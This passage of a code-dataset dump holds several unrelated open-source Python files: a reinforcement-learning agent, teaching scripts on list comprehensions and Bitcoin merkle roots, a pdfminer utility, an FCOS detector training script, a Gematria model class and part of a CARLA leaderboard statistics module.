not enough experiences\n            return np.array(self.memory, dtype = object)[0:len(self.memory)]\n        else:\n            random_number = random.randrange(len(self.memory) - self.batch_exp_size)\n            return np.array(self.memory, dtype = object)[random_number:random_number + self.batch_exp_size]\n\n    '''\n    Trains the neural network\n    '''\n    def learn_nn(self):\n        batch_exp = self.get_batch_exp()\n        q_next_states_target = self.target_network.forward(torch.tensor(batch_exp[:, 2].tolist()))\n        self.policy_network.learn(batch_exp=batch_exp, q_next_states=q_next_states_target)\n\n    '''\n    Applies an update of the Q' weights from Q\n    '''\n    def update_weights(self):\n        self.pas += 1\n        # print(self.pas)\n        if self.method_update_weights == 'copy' and self.pas == N:\n            self.pas = 0\n            weights = self.policy_network.get_weights()\n            # print(\"WEIGHTALORS\", weights)\n            self.target_network.update_weights_copy(weights)\n        elif self.method_update_weights == 'scale':\n            weights = 
self.policy_network.get_weights()\n            self.target_network.update_weights_scale(weights)\n\n    '''\n    Gets the best action\n    '''\n    def best_action(self, state, method):\n        if method == 'greedy':\n            return self.policy_network.greedy_forward(state=state)\n        else:\n            return self.policy_network.basic_forward(state=state)\n\n    '''\n    Saves the nn configurations to a file\n    '''\n    def save_perfs(self, filename):\n        torch.save({\n            'policy_network': self.policy_network.state_dict(),\n            'target_network': self.target_network.state_dict(),\n        }, filename)\n\n    '''\n    Loads the nn configurations from a file\n    '''\n    def load_perfs(self, filename):\n        checkpoint = torch.load(filename)\n        self.policy_network.load_state_dict(checkpoint['policy_network'])\n        self.target_network.load_state_dict(checkpoint['target_network'])\n    ","repo_name":"ruyters/ruyters.github.io","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30647851893","text":"# comprehension shorthand, for Python's list type only\nwordList=[\"school\", \"book\", \"bookstore\", \"desk\", \"hospital\", \"survey\",\n         \"assembly\", \"president\", \"python\", \"flower\", \"sky\", \"cloud\",\n         \"language\", \"phone\", \"house\"]\n\nnums = [1,2,3,4,5,6,7,8,9,10,17,19,21]\n\n# used to extract data from a list\n#[name for name in list]\n#[name for name in list if condition]  extracts only the items for which the condition is True\n#[func(name) for name in list if condition]  extracts the items passing the condition with their values transformed\n\n# soft copy (shallow copy) vs hard copy (deep copy)\n# every Python variable stores the address of its data, not the data itself\n# if there is a variable nums and we write nums2 = nums, the address stored in nums is\n# copied into nums2, so there is one piece of data and two variables owning the same data.\n# this is called a shallow copy and is the basic behavior of every reference/pointer variable\n# nums2 = nums # here the two variables own the same data space\n# nums2[0]=100\n# print( nums2 )\n# print( nums )\n\nnums2 = [x for x in nums] # hard-copy situation\nnums2[0]=100\n\nprint( nums )\nprint( nums2 )\n\nevenList = [ n for n in nums if n%2==0]\nprint( evenList )\n\n# extract only the multiples of 3\nevenList = [ nn for nn in nums if nn%3==0]\nprint( evenList )\n\n# extract only the words longer than 5 characters from wordList\nwList = [nn for nn in wordList if len(nn)>5]\nprint( wList )\n\n# extract the words longer than 5 characters from wordList, in upper case\nwList = [nn.upper() for nn in wordList if len(nn)>5]\nprint( wList )\n\ndataList = [\n    {\"name\":\"강감찬\", \"age\":23},\n    {\"name\":\"감강찬\", \"age\":20},\n    {\"name\":\"김연경\", \"age\":33},\n    {\"name\":\"조승연\", \"age\":28},\n    {\"name\":\"김연아\", \"age\":30},\n    {\"name\":\"이순신\", \"age\":43},\n    {\"name\":\"서휘\", \"age\":35},\n    {\"name\":\"윤관\", \"age\":27},\n    {\"name\":\"박세리\", \"age\":43}\n]\n\n# people aged 30 or over\nresultList = []\nprint (resultList )\n\ndList = [data for data in dataList if data[\"age\"]>=30]\nprint( dList )\nprint( len(dList) )\n\n# import an external library and give it a new name\nimport numpy as np\nx = [1,2,3,4,5] # list type\nx = np.array(x) # convert to ndarray type\ny = 2*x + 1 # vector operation, like in the R language\nprint( y )\n\n\n\n","repo_name":"kei-92xx/PD_day5","sub_path":"컴프리헨션.py","file_name":"컴프리헨션.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32683861843","text":"#!/usr/bin/env python\nimport sys\nimport fileinput\n\ndef main(argv):\n    state = 0\n    for line in fileinput.input():\n        line = line.strip()\n        if not line or line.startswith('#'):\n            if state == 1:\n                state = 2\n                print('}\\n')\n            print(line)\n            continue\n        if state == 0:\n            print('\\nglyphname2unicode = {')\n            state = 1\n        (name,x) = line.split(';')\n        codes = x.split(' ')\n        print(' %r: u\\'%s\\',' % (name, ''.join( '\\\\u%s' % code for code in codes )))\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","repo_name":"euske/pdfminer","sub_path":"tools/conv_glyphlist.py","file_name":"conv_glyphlist.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":5112,"dataset":"github-code","pt":"53"} +{"seq_id":"6354278974","text":"from datetime import date, timedelta\nfrom calendar import monthrange\n\nclass MeetupDayException(BaseException):\n    '''Raise when my specific value is wrong'''\n\ndef meetup_day(year, month, day, week):\n\tmonth_start = date(year, month, 1)\n\tfirst_day_with_name = _get_first_day_with_name(month_start, day)\n\tif week == 'teenth':\n\t\tweek_start = date(year, month, 13)\n\t\treturn _get_first_day_with_name(week_start, day)\n\telif week == 'last':\n\t\treturn _get_last_day_with_name(year, month, day)\n\telse:\n\t\tnew_date = first_day_with_name + timedelta(days=delta_map[week])\n\t\tif new_date.month == month:\n\t\t\treturn new_date\n\t\telse:\n\t\t\traise MeetupDayException\n\ndef _get_first_day_with_name(start, day):\n\tday_number = day_map[day]\n\tstart_day_number = start.weekday()\n\toffset = (day_number - start_day_number + 7) % 7\n\treturn start + timedelta(days=offset)\n\n\ndef _get_last_day_with_name(year, month, day):\n\tstart_day, length = monthrange(year, month)\n\tlast_day = date(year, month, length)\n\tlast_day_number = last_day.weekday()\n\tday_number = day_map[day]\n\toffset = (last_day_number - day_number + 7) % 7\n\treturn last_day - timedelta(days=offset)\n\ndelta_map = {\n\t'1st': 0,\n\t'2nd': 7,\n\t'3rd': 14,\n\t'4th': 21,\n\t'5th': 28\n}\n\nday_map = {\n\t'Monday': 0,\n\t'Tuesday': 1,\n\t'Wednesday': 2,\n\t'Thursday': 3,\n\t'Friday': 4,\n\t'Saturday': 5,\n\t'Sunday': 6\n}","repo_name":"Pappa/exercism","sub_path":"python/meetup/meetup.py","file_name":"meetup.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23823477866","text":"## Objective: hash A|B, C|D and then the interior nodes to get the\n## merkle root \n\n## Bitcoin relies on the SHA256 hash function\nfrom hashlib import sha256\nfrom codecs import decode\nfrom binascii import hexlify\n\n## Bitcoin uses the SHA256d hash function, which is the SHA256 function\n## run twice (double).\ndef sha256d(data):\n    return sha256(sha256(data).digest()).digest()\n\n## We'll get our data from Bitcoin Core, which displays hashes in RPC\n## Byte Order. 
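(Note added for clarity: RPC byte order is just the byte-reversed form of the internal order, so both conversions below are plain reversals.) 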
This converts hex to binary in Internal Byte Order.\ndef rpc2internal(hash):\n    return decode(hash, 'hex')[::-1]\n\n## We'll also want to display our results as hex in RPC Byte Order, so\n## we need to convert back.\ndef internal2rpc(hash):\n    return hexlify(hash[::-1])\n\n\n\n## build_tree takes a list of nodes in IBO and returns a merkle root in IBO\n## Take an array with a power-of-two number of merkle nodes and hash\n## each pair together. This is a recursive function where each level\n## higher on the call stack is a level closer to the merkle root\ndef build_tree(list_of_nodes):\n    ## if the list of nodes has only one hash, it's the merkle root\n    print(\"\\n\"+\"Printing list of nodes\")\n    print (list_of_nodes)\n    if len(list_of_nodes)==1:\n        return list_of_nodes[0]\n\n    ## Hash each pair together into a new list of nodes one level closer\n    ## to the merkle root\n    new_nodes = []\n    for i in range (0, len(list_of_nodes)-1,2):\n        new_nodes.append(sha256d(list_of_nodes[i] + list_of_nodes[i+1]))\n\n    ## Recursively build the next level closer to the merkle root\n    return (build_tree(new_nodes))\n\n\n \n\n\n\n## Take an array of txids and hash them together pairwise to produce a\n## merkle root.\ndef find_merkle_root(txids):\n    ## Start by converting all hashes to Internal Byte Order, using them\n    ## as the merkle leaf nodes\n    leaf_nodes = []\n    for i in range(0, len(txids)):\n        leaf_nodes.append(rpc2internal(txids[i]))\n    \n    ## Use build_tree() to find the merkle root and convert the result\n    ## to RPC byte order.\n    return internal2rpc(build_tree(leaf_nodes))\n\n## These are the txids from block 546. The correct merkle root is\n## e10a7f8442ea6cc6803a2b83713765c0b1199924110205f601f90fef125e7dfe\nblock_txids = [\n    \"e980fe9f792d014e73b95203dc1335c5f9ce19ac537a419e6df5b47aecb93b70\",\n    \"28204cad1d7fc1d199e8ef4fa22f182de6258a3eaafe1bbe56ebdcacd3069a5f\",\n    \"6b0f8a73a56c04b519f1883e8aafda643ba61a30bd1439969df21bea5f4e27e2\",\n    \"3c1d7e82342158e4109df2e0b6348b6e84e403d8b4046d7007663ace63cddb23\",\n]\n\nprint(find_merkle_root(block_txids))\n","repo_name":"myprak/21tutor","sub_path":"tut02/merkle-frame2.py","file_name":"merkle-frame2.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26402523436","text":"from collections.abc import Sequence\nfrom typing import Any\n\nfrom gematria.basic_block.python import basic_block\nfrom gematria.granite.python import gnn_model_base\nfrom gematria.granite.python import graph_builder\nfrom gematria.model.python import model_base\nfrom gematria.model.python import oov_token_behavior\nfrom gematria.model.python import token_model\nimport graph_nets\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\n_OutOfVocabularyTokenBehavior = oov_token_behavior.OutOfVocabularyTokenBehavior\n\n\nclass GraphBuilderModelBase(\n    token_model.TokenModel, gnn_model_base.GnnModelBase\n):\n  \"\"\"Base class for models using the BasicBlockGraphBuilder graphs.\n\n  The model integrates the basic block to graph transformation into the Gematria\n  framework and provides functionality for extracting per-instruction data out\n  of the output graph. 
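(Note added for clarity: instruction nodes are recovered from the output graph with a boolean node mask during readout.) 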
The construction of the graph network modules and the\n readout network must be done in child classes.\n \"\"\"\n\n # The name of GraphBuilderModelBase.special_tokens_tensor in the TensorFlow\n # graph.\n SPECIAL_TOKENS_TENSOR_NAME = 'GraphBuilderModelBase.special_tokens'\n\n # The name of the input tensor that receives the instruction node mask.\n INSTRUCTION_NODE_MASK_TENSOR_NAME = (\n 'GraphBuilderModelBase.instruction_node_mask'\n )\n\n # A Boolean tensor placeholder that receives a mask for instruction nodes. The\n # mask has shape (None,), and it must have the same length as\n # self._graphs_tuple_placeholders.nodes along the first dimension. It contains\n # True at position i if and only if self._graphs_tuple_placeholders.nodes[i]\n # is an instruction node (node_type == NodeType.INSTRUCTION). The mask is used\n # to collect the feature vectors of nodes corresponding to instructions for\n # further processing during readout.\n _instruction_node_mask: tf.Tensor\n\n # A tensor that contains feature vectors of nodes representing instructions in\n # the order in which they are in the basic block, i.e. in the same order\n # instructions appear in ModelBase._output_tensor_deltas.\n _instruction_features: tf.Tensor\n\n # The graph builder used to compose the GraphsTuple data structure passed to\n # the TensorFlow computation.\n _batch_graph_builder: graph_builder.BasicBlockGraphBuilder\n\n # A 1D int tensor that contains indices of special tokens used by the graph\n # builder. See the docstring of self.special_tokens_tensor for more details on\n # the format of the data.\n _special_tokens_tensor: tf.Tensor\n\n def __init__(\n self,\n *,\n tokens: Sequence[str],\n immediate_token: str,\n fp_immediate_token: str,\n address_token: str,\n memory_token: str,\n **kwargs: Any,\n ) -> None:\n \"\"\"Initializes the model with the given feature factory.\n\n Args:\n tokens: The list of tokens that may be associated with the nodes of the\n basic block graph (e.g. instruction mnemonics and register names used in\n the canonicalized basic block protos processed by the model). This list\n is passed to the basic block builder which translates the token for each\n node into its index in this list, and the index is then used as the\n feature of the node.\n immediate_token: The token that is associated with immediate value nodes\n in the basic block graph.\n fp_immediate_token: The token that is associated with floating-point\n immediate values in the basic block graph.\n address_token: The token that is associated with address computation nodes\n in the basic block graph.\n memory_token: The token that is associated with memory value nodes in the\n basic block graph.\n **kwargs: Additional keyword arguments are passed to the constructor of\n the base class.\n \"\"\"\n # NOTE(ondrasej): We set the node/edge feature dtypes to int32. They are\n # indices to the token list/edge type; an int32 should be sufficient for all\n # our use cases and fixing the type will make it easier to move the array\n # construction to the C++ code if needed in the future. 
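(Note added for clarity: a fixed 32-bit index type also keeps the serialized GraphsTuple arrays compact.) 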
Similarly for the\n # graph index dtype.\n super().__init__(\n node_feature_shape=(),\n node_feature_dtype=tf.dtypes.int32,\n edge_feature_shape=(),\n edge_feature_dtype=tf.dtypes.int32,\n global_feature_shape=(len(tokens),),\n global_feature_dtype=tf.dtypes.int32,\n graph_index_dtype=tf.dtypes.int32,\n tokens=tokens,\n **kwargs,\n )\n self._instruction_node_mask = None\n self._instruction_features = None\n self._batch_graph_builder = graph_builder.BasicBlockGraphBuilder(\n node_tokens=self._token_list,\n immediate_token=immediate_token,\n fp_immediate_token=fp_immediate_token,\n address_token=address_token,\n memory_token=memory_token,\n out_of_vocabulary_behavior=self._oov_behavior,\n )\n\n self._special_tokens_tensor = None\n\n @property\n def special_tokens_tensor(self) -> tf.Tensor:\n \"\"\"Returns the indices of special node tokens.\n\n The returned tensor contains indices of the special tokens in the list\n encoded in self.token_list_tensor. The indices of the special tokens are\n stored in the following order:\n 1. immediate value node token,\n 2. floating-point immediate value node token,\n 3. address computation node token,\n 4. memory value node token,\n 5. replacement token used to replace immediate values. This index is set\n to -1 when the model is not trained with replacement tokens.\n \"\"\"\n return self._special_tokens_tensor\n\n # @Override\n @property\n def output_tensor_names(self) -> Sequence[str]:\n return (\n *super().output_tensor_names,\n GraphBuilderModelBase.SPECIAL_TOKENS_TENSOR_NAME,\n )\n\n # @Override\n def _create_tf_graph(self) -> None:\n \"\"\"See base class.\"\"\"\n super()._create_tf_graph()\n special_tokens = np.array(\n (\n self._batch_graph_builder.immediate_token,\n self._batch_graph_builder.fp_immediate_token,\n self._batch_graph_builder.address_token,\n self._batch_graph_builder.memory_token,\n self._batch_graph_builder.replacement_token,\n ),\n dtype=np.int32,\n )\n self._special_tokens_tensor = tf.constant(\n special_tokens,\n dtype=tf.dtypes.int32,\n name=GraphBuilderModelBase.SPECIAL_TOKENS_TENSOR_NAME,\n )\n\n # @Override\n def _create_readout_network_resources(self) -> None:\n super()._create_readout_network_resources()\n self._instruction_node_mask = tf.placeholder(\n dtype=tf.dtypes.bool,\n shape=(None,),\n name=GraphBuilderModelBase.INSTRUCTION_NODE_MASK_TENSOR_NAME,\n )\n self._instruction_features = tf.boolean_mask(\n self._graphs_tuple_outputs.nodes, self._instruction_node_mask\n )\n\n # @Override\n def _start_batch(self) -> None:\n super()._start_batch()\n self._batch_graph_builder.reset()\n\n # @Override\n def _make_batch_feed_dict(self) -> model_base.FeedDict:\n feed_dict = super()._make_batch_feed_dict()\n feed_dict[self._instruction_node_mask] = np.array(\n self._batch_graph_builder.instruction_node_mask, dtype=bool\n )\n return feed_dict\n\n # @Override\n def _make_batch_graphs_tuple(self):\n node_features = np.array(\n self._batch_graph_builder.node_features,\n dtype=self._graph_node_feature_spec.dtype.as_numpy_dtype,\n )\n if self._oov_injection_probability > 0:\n # Each token is replaced with the probability\n # self._oov_injection_probability.\n # TODO(ondrasej): Consider initializing the random number generator using\n # some property of the batch, to ensure that the replacements for each\n # batch are stable.\n injection_mask = (\n np.random.default_rng().random(node_features.shape)\n < self._oov_injection_probability\n )\n node_features[injection_mask] = self._oov_token\n return graph_nets.graphs.GraphsTuple(\n 
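# Note added for clarity: all arrays below come from the graph builder's accumulated per-batch buffers.\n        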
nodes=node_features,\n edges=np.array(\n self._batch_graph_builder.edge_features,\n dtype=self._graph_edge_feature_spec.dtype.as_numpy_dtype,\n ),\n # NOTE(ondrasej): The graph globals are not normalized by the number of\n # nodes in the graph. We could do it here, but we can also do it by\n # introducing a LayerNorm layer in the first graph network module.\n globals=np.array(\n self._batch_graph_builder.global_features,\n dtype=self._graph_global_feature_spec.dtype.as_numpy_dtype,\n ),\n receivers=np.array(\n self._batch_graph_builder.edge_receivers,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n senders=np.array(\n self._batch_graph_builder.edge_senders,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n n_node=np.array(\n self._batch_graph_builder.num_nodes_per_block,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n n_edge=np.array(\n self._batch_graph_builder.num_edges_per_block,\n dtype=self._graph_index_dtype.as_numpy_dtype,\n ),\n )\n\n # @Override\n def _add_basic_block_to_batch(self, block: basic_block.BasicBlock) -> None:\n basic_block_was_added = self._batch_graph_builder.add_basic_block(block)\n if not basic_block_was_added:\n # TODO(ondrasej): Better handling of blocks that can't be added to the\n # batch. For now, we just let the exception propagate out of the model and\n # let the user handle it.\n raise model_base.AddBasicBlockError(\n f'Basic block could not be added to the batch: {block}'\n )\n","repo_name":"google/gematria","sub_path":"gematria/granite/python/graph_builder_model_base.py","file_name":"graph_builder_model_base.py","file_ext":"py","file_size_in_byte":9658,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"27677505538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 12 18:15:08 2020\n\n@author: sks\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport pprint\nimport pdb\nimport time\nimport logging\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom torch.utils.data.sampler import Sampler\n\n\nfrom databuild.roidb import combined_roidb\nfrom databuild.roibatchLoader import roibatchLoader, sampler\nfrom cfgs.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom functional.net_utils import weights_normal_init, save_net, load_net, adjust_learning_rate, save_checkpoint, clip_gradient\nfrom nets.FCOS import FCOS\nfrom exec.optimizer import make_lr_scheduler, make_optimizer\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Train the FCOS network\")\n parser.add_argument('--dataset', dest='dataset',\n help='training dataset',\n default='pascal_voc', type=str)\n parser.add_argument('--net', dest='net',\n help='res101, res152, etc',\n default='res101', type=str)\n parser.add_argument('--start_epoch', dest='start_epoch',\n help='starting epoch',\n default=1, type=int)\n parser.add_argument('--max_epochs', dest='max_epochs',\n help='number of epochs to train',\n default=24, type=int)\n parser.add_argument('--disp_interval', dest='disp_interval',\n help='number of iterations to display',\n default=10, type=int)\n parser.add_argument('--checkpoint_interval', dest='checkpoint_interval',\n help='number of iterations to display',\n default=10000, type=int)\n\n parser.add_argument('--save_dir', dest='save_dir',\n 
help='directory to save models',\n                        default='output', type=str)\n    parser.add_argument('--num_workers', dest='num_workers',\n                        help='number of workers to load data',\n                        default=1, type=int)\n    parser.add_argument('--cuda', dest='cuda',\n                        help='whether use CUDA',\n                        default=True, action='store_true')\n    parser.add_argument('--mGPUs', dest='mGPUs',\n                        help='whether use multiple GPUs',\n                        default=True, action='store_true')\n    parser.add_argument('--lscale', dest='lscale',\n                        help='whether use large scale',\n                        default=True, action='store_true')\n    parser.add_argument('--cfg', dest='cfg_file',\n                        help='optional config file (args.cfg_file was referenced below but never defined)',\n                        default=None, type=str)\n    parser.add_argument('--bs', dest='batch_size',\n                        help='batch size (args.batch_size was referenced below but never defined)',\n                        default=1, type=int)\n\n    parser.add_argument('--s', dest='session',\n                        help='training session',\n                        default=1, type=int)\n    parser.add_argument('--r', dest='resume',\n                        help='resume checkpoint or not',\n                        default=False, type=bool)\n    parser.add_argument('--checksession', dest='checksession',\n                        help='checksession to load model',\n                        default=1, type=int)\n    parser.add_argument('--checkepoch', dest='checkepoch',\n                        help='checkepoch to load model',\n                        default=1, type=int)\n    parser.add_argument('--checkpoint', dest='checkpoint',\n                        help='checkpoint to load model',\n                        default=0, type=int)\n\n    parser.add_argument('--use_tfboard', dest='use_tfboard',\n                        help='whether use tensorflow tensorboard',\n                        default=True, type=bool)\n\n    args = parser.parse_args()\n    return args\n\ndef is_pytorch_1_1_0_or_later():\n    return [int(_) for _ in torch.__version__.split(\".\")[:3]] >= [1, 1, 0]\n\nif __name__ == '__main__':\n\n    os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n    args = parse_args()\n    print('Called with args:')\n    print(args)\n\n    if args.dataset == 'pascal_voc':\n        args.imdb_name = 'voc_2007_trainval'\n        args.imdbval_name = 'voc_2007_test'\n        args.set_cfgs = ['MAX_NUM_GT_BOXES', '20']\n    elif args.dataset == 'pascal_voc_0712':\n        args.imdb_name = 'voc_2007_trainval+voc_2012_trainval'\n        args.imdbval_name = 'voc_2007_test'\n        args.set_cfgs = ['MAX_NUM_GT_BOXES', '20']\n    elif args.dataset == 'coco':\n        args.imdb_name = 'coco_2014_train+coco_2014_valminusminival'\n        args.imdbval_name = 'coco_2014_minival'\n        args.set_cfgs = ['MAX_NUM_GT_BOXES', '20']\n\n    if args.cfg_file is not None:\n        cfg_from_file(args.cfg_file)\n    if args.set_cfgs is not None:\n        cfg_from_list(args.set_cfgs)\n    print('Using config:')\n    pprint.pprint(cfg)\n\n    np.random.seed(cfg.RNG_SEED)\n\n    if torch.cuda.is_available() and not args.cuda:\n        print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n    cfg.TRAIN.USE_FLIPPED = True\n    cfg.USE_GPU_NMS = args.cuda\n    imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdb_name)\n    train_size = len(roidb)\n    print('{:d} roidb entries'.format(len(roidb)))\n\n    output_dir = args.save_dir + \"/\" + args.net + \"/\" + args.dataset\n    if not os.path.exists(output_dir):\n        os.makedirs(output_dir)\n\n    sampler_batch = sampler(train_size, args.batch_size)\n    dataset = roibatchLoader(roidb, ratio_list, ratio_index, args.batch_size, imdb.num_classes, training=True)\n    dataloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, sampler=sampler_batch,\n                            num_workers=args.num_workers)\n\n    im_data = torch.FloatTensor(1)\n    im_info = torch.FloatTensor(1)\n    num_boxes = torch.LongTensor(1)\n    gt_boxes = torch.FloatTensor(1)\n\n    if args.cuda:\n        im_data = im_data.cuda()\n        im_info = im_info.cuda()\n        num_boxes = num_boxes.cuda()\n        gt_boxes = gt_boxes.cuda()\n\n    im_data = Variable(im_data)\n    im_info = Variable(im_info)\n    num_boxes = Variable(num_boxes)\n    gt_boxes = Variable(gt_boxes)\n\n    if args.cuda:\n        cfg.CUDA = True\n\n    det_net = FCOS(imdb.classes)\n    optimizer = make_optimizer(det_net)\n    lr = optimizer.param_groups[0]['lr']  # define lr up front; it was previously set only on --r resume\n    
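# Note added for clarity: make_optimizer/make_lr_scheduler are this project's helpers from exec/optimizer.py.\n    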
scheduler = make_lr_scheduler(optimizer)\n    pytorch_1_1_0_or_later = is_pytorch_1_1_0_or_later()\n\n    if args.resume:\n        load_name = os.path.join(output_dir, 'fcos_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))\n        print(\"loading checkpoint %s\" % (load_name))\n        checkpoint = torch.load(load_name)\n        args.session = checkpoint['session']\n        args.start_epoch = checkpoint['epoch']\n        det_net.load_state_dict(checkpoint['model'])\n        optimizer.load_state_dict(checkpoint['optimizer'])\n        lr = optimizer.param_groups[0]['lr']\n        if 'pooling_mode' in checkpoint.keys():\n            cfg.POOLING_MODE = checkpoint['pooling_mode']\n        print(\"loaded checkpoint %s\" % (load_name))\n\n    if args.mGPUs:\n        det_net = nn.DataParallel(det_net)\n\n    if args.cuda:\n        det_net = det_net.cuda()\n\n    iters_per_epoch = int(train_size / cfg.SOLVER.IMS_PER_BATCH)\n    for epoch in range(args.start_epoch, args.max_epochs):\n        det_net.train()\n        loss_temp = 0\n        start = time.time()\n\n        if not pytorch_1_1_0_or_later:\n            scheduler.step()\n\n        data_iter = iter(dataloader)\n        for step in range(iters_per_epoch):\n            data = next(data_iter)  # data_iter.next() is Python 2 only\n            with torch.no_grad():\n                im_data.resize_(data[0].size()).copy_(data[0])\n                im_info.resize_(data[1].size()).copy_(data[1])\n                gt_boxes.resize_(data[2].size()).copy_(data[2])\n                num_boxes.resize_(data[3].size()).copy_(data[3])\n            det_net.zero_grad()\n\n            loss_box_cls, loss_box_reg, loss_centerness = det_net(im_data, im_info, gt_boxes)\n\n            loss = loss_box_cls.mean() + loss_box_reg.mean() + loss_centerness.mean()\n            loss_temp += loss.item()\n\n            optimizer.zero_grad()\n            loss.backward()\n            optimizer.step()\n\n            if step % args.disp_interval == 0:\n                end = time.time()\n                if step > 0:\n                    loss_temp /= args.disp_interval\n\n                if args.mGPUs:\n                    loss_box_cls = loss_box_cls.mean().item()\n                    loss_box_reg = loss_box_reg.mean().item()\n                    loss_centerness = loss_centerness.mean().item()\n                else:\n                    loss_box_cls = loss_box_cls.item()\n                    loss_box_reg = loss_box_reg.item()\n                    loss_centerness = loss_centerness.item()\n                print(\"[session %d][epoch %2d][iter %4d] loss: %.4f, lr: %.2e\" \\\n                    % (args.session, epoch, step, loss_temp, lr))\n                print(\"\\t\\t\\t loss_box_cls: %.4f, loss_box_reg: %.4f, loss_centerness: %.4f\" \\\n                    % (loss_box_cls, loss_box_reg, loss_centerness))\n\n                if args.use_tfboard:\n                    info = {\n                        'loss': loss_temp,\n                        'loss_box_cls': loss_box_cls,\n                        'loss_box_reg': loss_box_reg,\n                        'loss_centerness': loss_centerness,\n                    }\n\n                loss_temp = 0\n                start = time.time()\n\n        if pytorch_1_1_0_or_later:\n            scheduler.step()\n\n        if args.mGPUs:\n            save_name = os.path.join(output_dir, 'fcos_{}_{}_{}.pth'.format(args.session, epoch, step))\n            save_checkpoint({\n                'session': args.session,\n                'epoch': epoch + 1,\n                'model': det_net.module.state_dict(),\n                'optimizer': optimizer.state_dict(),\n            }, save_name)\n        else:\n            save_name = os.path.join(output_dir, 'fcos_{}_{}_{}.pth'.format(args.session, epoch, step))\n            save_checkpoint({\n                'session': args.session,\n                'epoch': epoch + 1,\n                'model': det_net.state_dict(),  # no .module when the net is not wrapped in DataParallel\n                'optimizer': optimizer.state_dict(),\n            }, save_name)\n        print('save model: {}'.format(save_name))\n\n        end = time.time()\n        print(end - start)\n","repo_name":"suhumathe/FCOSReproduce","sub_path":"exec/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23217940146","text":"from functools import cmp_to_key\nimport sys\nimport re\nfrom collections import deque\n\nread = sys.stdin.readline\nalphabets = 
'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz'\npriority = {a: i for i, a in enumerate(alphabets)}\n\n\ndef parse_char(s: str) -> list:\n if s.isnumeric():\n return [s]\n return list(s)\n\n\ndef parse_line(s: str) -> list:\n ret = []\n for c in s:\n if c.isalpha():\n ret.append(c)\n continue\n\n if ret and ret[-1].isnumeric():\n ret[-1] += c\n continue\n ret.append(c)\n return ret\n\n\ndef compare_int(n1: str, n2: str) -> int:\n if int(n1) == int(n2):\n return len(n1)-len(n2)\n return int(n1)-int(n2)\n\n\ndef compare(s1: str, s2: str) -> int:\n s1 = parse_line(s1)\n s2 = parse_line(s2)\n length = min(len(s1), len(s2))\n\n for c1, c2 in zip(s1[:length], s2[:length]):\n if c1.isnumeric() and c2.isnumeric():\n if compare_int(c1, c2) == 0:\n continue\n return compare_int(c1, c2)\n if c1.isnumeric():\n return -1\n elif c2.isnumeric():\n return 1\n elif priority[c1] == priority[c2]:\n continue\n else:\n return priority[c1]-priority[c2]\n return len(s1)-len(s2)\n\n\nN = int(read())\n\nstrings = [read().rstrip() for _ in range(N)]\nprint(*sorted(strings, key=cmp_to_key(compare)), sep=\"\\n\")","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob20210.py","file_name":"prob20210.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73543102568","text":"from __future__ import print_function\n\nfrom dictor import dictor\nimport math\nimport sys\nfrom datetime import datetime\nimport csv\n\nfrom srunner.scenariomanager.traffic_events import TrafficEventType\n\nfrom leaderboard.utils.checkpoint_tools import fetch_dict, save_dict, create_default_json_msg\n\nPENALTY_COLLISION_PEDESTRIAN = 0.50\nPENALTY_COLLISION_VEHICLE = 0.60\nPENALTY_COLLISION_STATIC = 0.65\nPENALTY_TRAFFIC_LIGHT = 0.70\nPENALTY_STOP = 0.80\n\n\nclass RouteRecord():\n def __init__(self):\n self.route_id = None\n self.index = None\n self.status = 'Started'\n self.infractions = {\n 'collisions_pedestrian': [],\n 'collisions_vehicle': [],\n 'collisions_layout': [],\n 'red_light': [],\n 'stop_infraction': [],\n 'outside_route_lanes': [],\n 'route_dev': [],\n 'route_timeout': [],\n 'vehicle_blocked': []\n }\n\n self.scores = {\n 'score_route': 0,\n 'score_penalty': 0,\n 'score_composed': 0\n }\n\n self.meta = {}\n\n\ndef to_route_record(record_dict):\n record = RouteRecord()\n for key, value in record_dict.items():\n setattr(record, key, value)\n\n return record\n\n\ndef compute_route_length(config):\n trajectory = config.trajectory\n\n route_length = 0.0\n previous_location = None\n for location in trajectory:\n if previous_location:\n dist = math.sqrt((location.x-previous_location.x)*(location.x-previous_location.x) +\n (location.y-previous_location.y)*(location.y-previous_location.y) +\n (location.z - previous_location.z) * (location.z - previous_location.z))\n route_length += 